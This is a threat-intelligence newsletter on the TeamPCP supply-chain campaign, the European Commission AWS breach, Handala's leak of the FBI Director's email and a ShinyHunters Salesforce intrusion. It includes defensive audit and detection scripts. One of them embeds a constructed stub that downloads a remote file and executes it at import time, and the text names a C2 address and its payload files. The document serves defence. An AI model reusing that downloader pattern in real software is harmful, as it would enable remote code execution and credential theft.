Satine Sentinel: March 27, 2026

A credential chain detonated across the developer ecosystem this week. TeamPCP spent nine days turning one backdoored security tool into a cascading series of poisoned packages spanning npm, PyPI, CI/CD pipelines, and telephony infrastructure, with steganography as the finishing touch. The European Commission lost 350GB of data out of an AWS account nobody was watching closely enough. Iran’s Handala group hacked the personal Gmail of the FBI Director, published his decade-old emails and photos, and framed it as revenge for the bureau seizing their domains. And ShinyHunters ran their now-routine Salesforce credential play against the student information system that manages records for 11 million American K-12 students.

This week: one supply chain campaign that should change how every organization thinks about CI/CD secret hygiene, a cloud account breach at the EU’s top executive body, an Iranian cyber retaliation that is mostly embarrassing but points toward something more serious, and a Salesforce access vector that has now been used against hundreds of organizations with almost no variation.


TeamPCP: The Credential Chain That Ate the Developer Ecosystem

What happened:

On March 19, the threat actor group TeamPCP backdoored Trivy, Aqua Security's open-source vulnerability scanner; the compromise is tracked as CVE-2026-33634 (CVSS 9.4). The group force-pushed malicious binaries to 75 of 77 trivy-action tags and 7 setup-trivy tags, so any pipeline that referenced either action by tag, or with no pin at all, rather than by commit SHA pulled the backdoor, which harvested CI/CD secrets including npm tokens, Docker Hub credentials, and PyPI publishing tokens. By end of day, 44 Aqua Security GitHub repositories had been renamed with the prefix tpcp-docs-. The stolen credentials fueled every subsequent attack. On March 20, using npm tokens stolen from Trivy victims, TeamPCP deployed the CanisterWorm backdoor across 46+ npm packages, automating the step from token to compromise: given one stolen npm token, it enumerated every package that token could publish, bumped versions, and pushed malicious releases across entire scopes in under 60 seconds. By March 24, LiteLLM, a widely used LLM proxy library, was hit on PyPI. By March 27, the Telnyx Python telephony SDK, with 742,000 monthly downloads, was compromised the same way. This is TeamPCP's third PyPI strike in eight days.
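The tag force-push is the detail that decides who was exposed: a workflow pinned to `trivy-action@0.28.0` pulled the backdoor just like an unpinned one, because a tag is a mutable pointer, while a workflow pinned to a full 40-character commit SHA kept running the original code. The audit below is an added example (not Aqua Security's, GitHub's or TeamPCP's code) that scans workflow YAML for `uses:` references and reports which ones are not SHA-pinned; the sample workflow and the placeholder SHA in it are constructed for the example.

```python
"""Audit GitHub Actions workflow files for actions referenced by a mutable tag or branch
instead of a full commit SHA. Added example; not Aqua Security's or TeamPCP's code."""
from __future__ import annotations
import re

# `uses: owner/repo[/subpath]@ref`; local (./) and docker:// references are ignored.
USES_RE = re.compile(
    r"^\s*-?\s*uses:\s*['\"]?([\w.-]+/[\w.-]+(?:/[\w./-]+)?)@([^\s'\"#]+)", re.M
)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Actions whose tags were force-pushed in the campaign described above.
TRIVY_ACTIONS = {"aquasecurity/trivy-action", "aquasecurity/setup-trivy"}


def audit_workflow(text: str, watch: set[str] = TRIVY_ACTIONS) -> list[dict]:
    """Return one finding per `uses:` line: the action, its ref, whether the ref is an
    immutable 40-hex commit SHA, and whether the repository is on the watch list."""
    findings = []
    for m in USES_RE.finditer(text):
        action, ref = m.group(1), m.group(2)
        repo = "/".join(action.split("/")[:2])  # owner/repo without any sub-path
        findings.append({
            "action": action,
            "ref": ref,
            "pinned": bool(FULL_SHA_RE.match(ref)),
            "watched": repo in watch,
        })
    return findings


def unpinned_watched(text: str, watch: set[str] = TRIVY_ACTIONS) -> list[str]:
    """Watched actions that a tag force-push would have silently swapped out."""
    return [f["action"] for f in audit_workflow(text, watch)
            if f["watched"] and not f["pinned"]]


# Constructed workflow resembling a pipeline that ran Trivy by tag during the incident.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  trivy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run Trivy
        uses: aquasecurity/trivy-action@0.28.0
        with:
          scan-type: fs
      - uses: aquasecurity/setup-trivy@v0.2.2
      # placeholder SHA, constructed for the example, not a real upload-artifact commit
      - uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        status = "ok (sha)" if f["pinned"] else "UNPINNED"
        flag = " <- watched action" if f["watched"] else ""
        print(f"{status:10} {f['action']}@{f['ref']}{flag}")
    print("exposed:", unpinned_watched(SAMPLE_WORKFLOW))
```

Run it over every file in `.github/workflows/` and treat any watched, unpinned hit as a credential-exposure event for that pipeline, not a hygiene warning. A SHA pin only defeats the force-push trick; it does not protect you when you later bump the pin to a commit the attacker authored, so pair it with reviewed dependency updates and with egress restrictions on runners that hold publishing tokens.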

Technical details that matter:

The telnyx compromise introduced WAV steganography as a payload delivery mechanism, a technique the group first tested in a Kubernetes wiper variant on March 22. On Windows, the implant downloads hangup.wav from 83[.]142[.]209[.]203:8080, decodes an XOR-obfuscated executable from the audio frames, and drops it as msbuild.exe in the Windows Startup folder, where it runs silently on every login; a hidden .lock file enforces a 12-hour cooldown before the file is dropped again. On Linux and macOS, it fetches ringtone.wav from the same C2, decodes a third-stage collector script from the WAV frames with the same XOR technique, and runs it by piping it on stdin to a fresh interpreter (sys.executable). The collector's output is encrypted with AES-256-CBC and a hardcoded RSA-4096 public key (the usual hybrid arrangement: a symmetric key for the data, the public key to wrap it) and then exfiltrated. The malicious code was injected into telnyx/_client.py, so it runs as soon as the package is imported into a Python application, with no user interaction required. The GitHub source remained clean throughout; only the PyPI artifacts were poisoned, which is why comparing the published wheel or sdist against the tagged source tree catches this where a review of the repository does not. The LiteLLM compromise was traced to a poisoned Trivy binary that exfiltrated PYPI_PUBLISH_PASSWORD from CI runners. Each link in the chain was forged with credentials stolen from the previous victim. TeamPCP announced collaborations with LAPSUS$ and an emerging ransomware group called Vect to conduct extortion and ransomware operations with the harvested credentials.
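Because the repository stayed clean and only the published artifacts carried the implant, the useful check is a file-level diff between what pip installed and the project's tagged source tree, with any lines added on the artifact side screened for import-time network and process primitives of the kind described above. The script below is an added example (not Telnyx's, LiteLLM's or TeamPCP's code) that builds two constructed package trees in a temporary directory, one mirroring a clean checkout and one with a stub downloader appended to `_client.py`, and reports what differs; the TEST-NET address in the stub is a placeholder, not the campaign's C2.

```python
"""Diff a package as installed from a PyPI artifact against the project's source tree and
flag artifact-only additions that look like import-time downloaders. Added example; the
two trees below are constructed in a temp dir and are not real Telnyx or LiteLLM code."""
from __future__ import annotations
import difflib
import hashlib
import re
import tempfile
from pathlib import Path

# Primitives a release artifact should not gain relative to its source tree.
SUSPECT_RE = re.compile(
    r"urllib\.request|urlopen|requests\.(?:get|post)|socket\.|subprocess|sys\.executable"
    r"|\bexec\(|\beval\(|b64decode|\bStartup\b|\.lock\b"
)


def file_digests(root: Path) -> dict[str, str]:
    """Relative POSIX path -> SHA-256 for every .py file under root."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*.py")}


def compare_trees(source: Path, artifact: Path) -> dict:
    """Report files only in the artifact, files missing from it, and for modified files
    the lines the artifact adds, with the ones matching SUSPECT_RE called out."""
    src, art = file_digests(source), file_digests(artifact)
    report = {"added": sorted(set(art) - set(src)),
              "missing": sorted(set(src) - set(art)),
              "modified": {}}
    for rel in sorted(set(src) & set(art)):
        if src[rel] == art[rel]:
            continue
        a = (source / rel).read_text().splitlines()
        b = (artifact / rel).read_text().splitlines()
        added = [line[1:] for line in difflib.unified_diff(a, b, lineterm="", n=0)
                 if line.startswith("+") and not line.startswith("+++")]
        report["modified"][rel] = {
            "added_lines": added,
            "suspect": [line for line in added if SUSPECT_RE.search(line)],
        }
    return report


# Constructed sample: a clean client module and the same module with a downloader stub
# appended, mimicking an import-time fetch-and-execute (placeholder TEST-NET address).
CLEAN_CLIENT = '''import json

class Client:
    def __init__(self, api_key):
        self.api_key = api_key
'''
POISONED_CLIENT = CLEAN_CLIENT + '''
import urllib.request, os, subprocess, sys  # constructed stub for the example
def _init():
    data = urllib.request.urlopen("http://203.0.113.10:8080/ringtone.wav").read()
    subprocess.run([sys.executable, "-"], input=data)
_init()
'''


def build_sample() -> tuple[Path, Path]:
    """Create (source_tree, artifact_tree) in a fresh temp dir; artifact also gains a file."""
    root = Path(tempfile.mkdtemp(prefix="pkgdiff-"))
    source, artifact = root / "src", root / "site-packages"
    for base, client in ((source, CLEAN_CLIENT), (artifact, POISONED_CLIENT)):
        (base / "pkg").mkdir(parents=True)
        (base / "pkg" / "__init__.py").write_text("from ._client import Client\n")
        (base / "pkg" / "_client.py").write_text(client)
    (artifact / "pkg" / "_vendor.py").write_text("# present only in the artifact\n")
    return source, artifact


if __name__ == "__main__":
    source, artifact = build_sample()
    result = compare_trees(source, artifact)
    print("artifact-only files:", result["added"])
    for rel, info in result["modified"].items():
        print(f"{rel}: {len(info['added_lines'])} added lines, "
              f"{len(info['suspect'])} suspect:")
        for line in info["suspect"]:
            print("   ", line.strip())
```

In practice the source tree is a `git checkout` of the release tag and the artifact is the unpacked result of `pip download <pkg>==<version> --no-deps`; modules are compared at the package level because wheels carry no git metadata. Any artifact-only file or any added line hitting the suspect list deserves a manual read before the version is allowed anywhere near a runner that holds credentials.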

Why critical institutions should care:

This campaign is not opportunistic. It is a systematic, credential-chaining operation that weaponizes the security tooling organizations use to stay safe. If your CI/CD pipeline ran trivy-action or setup-trivy referenced by tag, or with no pin at all, during the week of March 19, assume your publishing tokens were stolen and that everything those tokens could reach became a potential attack vector; only a pin to a full commit SHA was immune to the tag force-push. Defenders should treat any host or CI job that installed litellm 1.82.7 or 1.82.8, or telnyx 4.87.1 or 4.87.2, as a full-credential exposure event and investigate for persistence, outbound traffic, and Kubernetes activity, not just package presence. Because the payload now arrives over live C2 inside an audio file rather than as an embedded blob, static scanners that flag base64 strings will miss it; what remains visible in the package is the downloader itself (an outbound fetch at import time, a write into the Startup folder, a hidden .lock file), so detection has to key on that behaviour. The exfiltration target is your secrets: cloud credentials, database passwords, CI tokens, Kubernetes service account tokens, .env files. If any of that was reachable from an affected environment, assume it is now in TeamPCP's possession.

Key sources:


European Commission AWS Breach: 350GB Out the Door From a Cloud Account

What happened:

The European Union's executive arm was breached on March 24. The attack hit the Commission's Amazon Web Services account before being detected and blocked. The threat actor who claimed responsibility contacted BleepingComputer, stating that they had stolen over 350GB of data, including multiple databases, and provided screenshots as proof of access to European Commission employee data and an email server. The Commission, which stressed that internal systems were not affected, said it is in the process of notifying the Union entities that might have been affected. The EU's executive arm employs about 32,000 civil servants. AWS confirmed its own infrastructure was not compromised; the failure was at the account and credential layer. The Commission has not attributed the attack publicly.

Technical details that matter:

The Commission has disclosed almost nothing about the attack vector, but what has been said (AWS confirmed its own infrastructure was not compromised) points to the account and identity layer rather than a platform flaw. Forensic work is still establishing how the account was compromised: stolen or leaked credentials, a misconfiguration such as an over-permissive role or publicly reachable resource, or some other access path. The breach fits an uncomfortable pattern: a separate intrusion into European Commission networks on January 30 was linked to the Ivanti EPMM exploitation seen across other European institutions. The attacker claimed access not just to website data but to an email server, which would be significantly more sensitive than the public-facing web infrastructure the Commission acknowledged. According to the Commission, strict segmentation between the public-facing AWS environment and the internal network stopped lateral movement and prevented a far more severe compromise. Even if that holds, the investigation is still establishing what exactly the attacker accessed in the window between initial compromise and detection.

Why critical institutions should care:

The Commission's stated position on cloud security and digital sovereignty now has a visible crack in it, but the lesson for the wider industry is broader: cloud security is no longer just about infrastructure. Identity, access, and account-level controls are the new frontline and, increasingly, the weakest link. AWS did not fail here. A credential did. Any organization running cloud workloads with service accounts, API keys, or admin credentials that are not rotated regularly, monitored for anomalous use, and protected with MFA faces the same exposure. The segmentation the Commission describes between its public-facing AWS environment and its core systems may have averted a catastrophic outcome, but 350GB of data leaving a government cloud account is not a contained incident; it is a disclosure and counter-intelligence problem that will take months to fully scope.
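The three account-layer controls named above (MFA on console users, rotation of long-lived keys, and attention to keys nobody uses) can all be checked from one artifact, the IAM credential report. The script below is an added example, not the Commission's or AWS's code: it parses a credential report offline and flags the weaknesses in question. The CSV is constructed in the real credential-report column layout with the AWS documentation placeholder account ID; in production you would obtain the report with `aws iam generate-credential-report` followed by `aws iam get-credential-report`, and the thresholds are assumptions to tune to your own policy.

```python
"""Offline triage of an AWS IAM credential report for the account-layer weaknesses an
AWS account compromise usually comes down to. Added example; not the Commission's or
AWS's code. SAMPLE_REPORT is constructed in the real credential-report column layout."""
from __future__ import annotations
import csv
import io
from datetime import datetime, timedelta, timezone

NOW = datetime(2026, 3, 27, 12, 0, tzinfo=timezone.utc)  # fixed clock, reproducible output
MAX_KEY_AGE = timedelta(days=90)    # assumed policy: rotate long-lived keys at least this often
UNUSED_GRACE = timedelta(days=30)   # assumed policy: an active key unused this long is dead weight

SAMPLE_REPORT = """user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_1_last_used_region,access_key_1_last_used_service,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date,access_key_2_last_used_region,access_key_2_last_used_service,cert_1_active,cert_1_last_rotated,cert_2_active,cert_2_last_rotated
<root_account>,arn:aws:iam::111122223333:root,2021-01-10T09:00:00+00:00,true,2026-03-01T08:00:00+00:00,not_supported,not_supported,true,false,N/A,N/A,N/A,N/A,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
web-deploy,arn:aws:iam::111122223333:user/web-deploy,2022-05-02T10:00:00+00:00,false,N/A,N/A,N/A,false,true,2023-02-14T10:00:00+00:00,2026-03-24T03:12:00+00:00,eu-west-1,s3,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
alice,arn:aws:iam::111122223333:user/alice,2024-08-01T10:00:00+00:00,true,2026-03-20T07:30:00+00:00,2025-11-01T10:00:00+00:00,2026-02-01T10:00:00+00:00,false,false,N/A,N/A,N/A,N/A,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
ci-runner,arn:aws:iam::111122223333:user/ci-runner,2026-01-15T10:00:00+00:00,false,N/A,N/A,N/A,false,true,2026-01-15T10:00:00+00:00,N/A,N/A,N/A,true,2026-03-01T10:00:00+00:00,2026-03-26T23:59:00+00:00,eu-west-1,sts,false,N/A,false,N/A
"""


def _ts(value: str) -> datetime | None:
    """Report timestamps are ISO 8601; N/A, not_supported and no_information become None."""
    try:
        return datetime.fromisoformat(value)
    except ValueError:
        return None


def audit_credential_report(report_csv: str, now: datetime = NOW) -> list[dict]:
    """Return findings as {user, issue, detail}, in report order."""
    findings = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        user = row["user"]
        is_root = user == "<root_account>"
        if row["password_enabled"] == "true" and row["mfa_active"] != "true":
            findings.append({"user": user, "issue": "no_mfa",
                             "detail": "console password enabled without MFA"})
        next_rotation = _ts(row["password_next_rotation"])
        if next_rotation and next_rotation < now:
            findings.append({"user": user, "issue": "password_overdue",
                             "detail": f"password rotation was due {next_rotation.date()}"})
        for n in ("1", "2"):
            if row[f"access_key_{n}_active"] != "true":
                continue
            if is_root:
                findings.append({"user": user, "issue": "root_access_key",
                                 "detail": f"root account has active access key {n}"})
            rotated = _ts(row[f"access_key_{n}_last_rotated"])
            age = now - rotated if rotated else None
            if age and age > MAX_KEY_AGE:
                findings.append({"user": user, "issue": "stale_key",
                                 "detail": f"access_key_{n} not rotated for {age.days} days"})
            if _ts(row[f"access_key_{n}_last_used_date"]) is None and age and age > UNUSED_GRACE:
                findings.append({"user": user, "issue": "unused_key",
                                 "detail": f"access_key_{n} active but never used in {age.days} days"})
    return findings


if __name__ == "__main__":
    for f in audit_credential_report(SAMPLE_REPORT):
        print(f"{f['issue']:17} {f['user']:14} {f['detail']}")
```

The report only answers the static questions. Whether a key was used from an unexpected region or service is a CloudTrail question, and the `access_key_N_last_used_region` and `_service` columns are the hint for where to start that query.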

Key sources:


Handala Hacks the FBI Director’s Gmail: Iran’s Retaliatory Cyber Signal

What happened:

A hacking group backed by the Iranian government dubbed Handala said on Friday that it has breached the personal email account of FBI director Kash Patel. The FBI confirmed that Patel’s emails had been targeted. Alongside photographs of Patel, the hackers published a sample of more than 300 emails, which appear to show a mix of personal and work correspondence dating between 2010 and 2019. Handala claims the breach is in response to the FBI’s operation last week to seize several of the hacker group’s domains, after Handala claimed responsibility for a cyberattack on U.S. medical tech company Stryker. The FBI stated the information “is historical in nature and involves no government information.” The metadata on the published files indicates the emails were obtained before the current conflict escalated.

Technical details that matter:

The personal Gmail address Handala claims to have broken into matches the address linked to Patel in earlier data breaches preserved by the dark web intelligence firm District 4 Labs. That points to one of two access vectors: credential stuffing with previously breached credentials, or targeted phishing of a personal account that was not protected by hardware security keys. U.S. officials told Patel in late 2024, before he agreed to lead the FBI, that he had been the target of an Iranian cyberattack and that the hackers had sought his communications. That 2024 campaign, attributed to Iran's IRGC, targeted multiple incoming Trump officials through compromised personal accounts. Handala has therefore either retained material from the 2024 compromise and is publishing it now, or conducted a second, separate intrusion. The distinction matters: one is a fresh breach, the other a slow-drip release of previously stolen material timed for maximum political effect. The folders containing the leaked emails were last modified on May 21, 2025, which suggests collection happened well before publication.

Why critical institutions should care:

The operational lesson here is not that the FBI Director got hacked. Senior officials at critical institutions are high-value targets for exactly this kind of influence operation, and the separation between personal and professional digital identity matters enormously. Iran is known to lean on proxy groups like Handala for its cyber operations, making it more difficult for targeted entities to formally attribute attacks to the Iranian government. What this incident demonstrates is that personal email accounts at consumer providers like Gmail, regardless of the individual’s professional role or security clearance, are not protected by enterprise security controls, are frequently reachable via credential stuffing from old breaches, and can become weapons long after the initial compromise. Any organization whose leadership conducts sensitive professional discussions over personal email channels is running the same risk. The timing of publication, framed as retaliation for a law enforcement action, is also a signal: Handala is demonstrating an ability to respond to U.S. government pressure with public embarrassment of senior officials.

Key sources:


ShinyHunters vs. Infinite Campus: The Salesforce Account Play, Again

What happened:

Infinite Campus, a major U.S. K-12 student information system provider, warned customers of a security incident after attackers gained access to an employee’s Salesforce account, exposing limited data primarily consisting of contact and directory-style information. The company said it detected suspicious activity on March 18, 2026, quickly disabled the affected account, and launched an investigation, adding that there is no evidence customer databases or student records were accessed. ShinyHunters gave the company until March 25 to initiate contact and negotiate a ransom. Infinite Campus said it will not engage with the attacker. The company manages data for 11 million students across 3,200 school districts in 46 states. The attackers’ actual haul appears to have been primarily school staff contact information, not student records.

Technical details that matter:

ShinyHunters has been running campaigns against Salesforce customers for several months, with victims including Cisco, Adidas, Qantas, and Allianz Life. In these attacks the group uses voice phishing (vishing) to talk employees into granting access, or steals OAuth tokens, and then uses that access to exfiltrate CRM data. ShinyHunters is described as a group known for targeting the Salesforce accounts of hundreds of companies, claiming more than 1.5 billion records stolen across the Salesloft Drift hack and the more recent Salesforce Aura campaign. The attack on Infinite Campus follows the same playbook: single employee account compromise, CRM data exfiltration, dark web listing with a short deadline, threats to escalate. What distinguishes this instance is the target's sector. Salesforce CRM data at an EdTech company that sits between schools and a student information system could contain support tickets with sensitive student or family information, login credentials, or system configuration details, even if the core student databases remained untouched.

Why critical institutions should care:

Could clients have included their login or other credentials in their help tickets with Salesforce? Could they have included actual or sensitive student or employee data when seeking customer support? That is not yet fully known. This is the underlying risk that Infinite Campus and every other SaaS vendor with a Salesforce support infrastructure faces: the CRM that manages customer relationships often contains far more sensitive data than intended, because users paste credentials, describe system configurations, or attach sensitive files when seeking help. ShinyHunters has now proven this attack works at scale against hundreds of organizations. Salesforce Aura misconfigurations that expose data, combined with vishing or OAuth token theft to gain initial access, represent a systematic weakness in how organizations manage their customer-facing CRM environments. A student information system with 11 million students in scope is an obvious target for exactly this kind of incremental data collection.
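Whether credentials or student data ended up in tickets is answerable before an incident, by scanning the case export the same way an attacker would read it. The script below is an added example, not Infinite Campus's, Salesforce's or ShinyHunters' code: it runs a starting set of secret and identifier patterns over constructed CRM case records, reports what each case leaks, and produces a redacted body. The case records are constructed (the AWS key is the documented `AKIAIOSFODNN7EXAMPLE` placeholder) and the pattern list is deliberately small; a production scan would use a fuller ruleset and run against the real case, comment and attachment objects.

```python
"""Scan a CRM support-case export for credentials and identifiers customers pasted into
tickets, and redact them. Added example; the case records are constructed and the
patterns are a starting set, not a complete secret-detection ruleset."""
from __future__ import annotations
import re

PATTERNS = {
    "aws_access_key_id":    re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token":         re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "private_key_block":    re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "jwt":                  re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\b"),
    "password_assignment":  re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*\S{6,}"),
    "db_connection_string": re.compile(r"\b(?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?)://[^\s:]+:[^\s@]+@"),
    "ssn_like":             re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

# Constructed case records in the shape of a flattened Case export (Id, Subject, Description).
SAMPLE_CASES = [
    {"id": "00001001", "subject": "Grade sync failing",
     "body": "Sync job errors since Monday, logs attached."},
    {"id": "00001002", "subject": "Can't log in as district admin",
     "body": "Try it yourself: user districtadmin, password: Spring2026! on the staging site."},
    {"id": "00001003", "subject": "S3 export stuck",
     "body": "Our export user key is AKIAIOSFODNN7EXAMPLE and the bucket is sis-exports."},
    {"id": "00001004", "subject": "DB connectivity",
     "body": "JDBC string we use: postgresql://sisreport:Rep0rt!pass@db.example.org:5432/sis"},
    {"id": "00001005", "subject": "Wrong enrollment record",
     "body": "Student 123-45-6789 shows the wrong homeroom after the import."},
]


def scan_text(text: str) -> list[str]:
    """Names of every pattern that matches somewhere in text, in PATTERNS order."""
    return [name for name, pat in PATTERNS.items() if pat.search(text)]


def scan_cases(cases: list[dict]) -> list[dict]:
    """One finding per (case, pattern) across subject and body."""
    findings = []
    for case in cases:
        for name in scan_text(case["subject"] + "\n" + case["body"]):
            findings.append({"case": case["id"], "type": name})
    return findings


def redact(text: str) -> str:
    """Replace every match with a typed placeholder so the text can be stored or shared."""
    for name, pat in PATTERNS.items():
        text = pat.sub(f"[REDACTED:{name}]", text)
    return text


if __name__ == "__main__":
    for f in scan_cases(SAMPLE_CASES):
        print(f"case {f['case']}: {f['type']}")
    for case in SAMPLE_CASES:
        if scan_text(case["body"]):
            print(f"{case['id']} redacted -> {redact(case['body'])}")
```

Run the same scan over attachments and case comments, not only the description field, and treat the result as both a cleanup list and, after a compromise like this one, the list of credentials that must be rotated because they were in the attacker's haul.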

Key sources:


The Pattern This Week

The unifying thread is not sophistication. It is patience and reuse. TeamPCP did not invent a novel vulnerability; they compromised one security tool and then methodically spent nine days extracting value from every credential it exposed, moving from npm to PyPI to AI libraries to telephony infrastructure. Handala did not break into classified FBI systems; they published material from a 2024 personal Gmail compromise at the most politically embarrassing moment possible. ShinyHunters did not build new attack infrastructure; they ran the same Salesforce vishing play they have used against hundreds of organizations, against a company sitting in front of 11 million student records.

The European Commission’s breach is the only one this week where the attack vector remains genuinely unknown. That ambiguity is worth noting: the absence of attribution and technical detail from the Commission means defenders cannot determine whether they face the same exposure. When major institutions do not disclose attack vectors, the rest of the sector cannot learn from the incident.

The defender's problem across all four incidents is that none of these vectors required a zero-day: compromised CI/CD credentials, an AWS account without adequate access controls, a personal Gmail account, and a Salesforce account reached through vishing or a stolen OAuth token. If you are waiting for sophisticated adversaries with novel exploits before taking cloud identity management seriously, you are protecting against the wrong threat model.

See you next week.
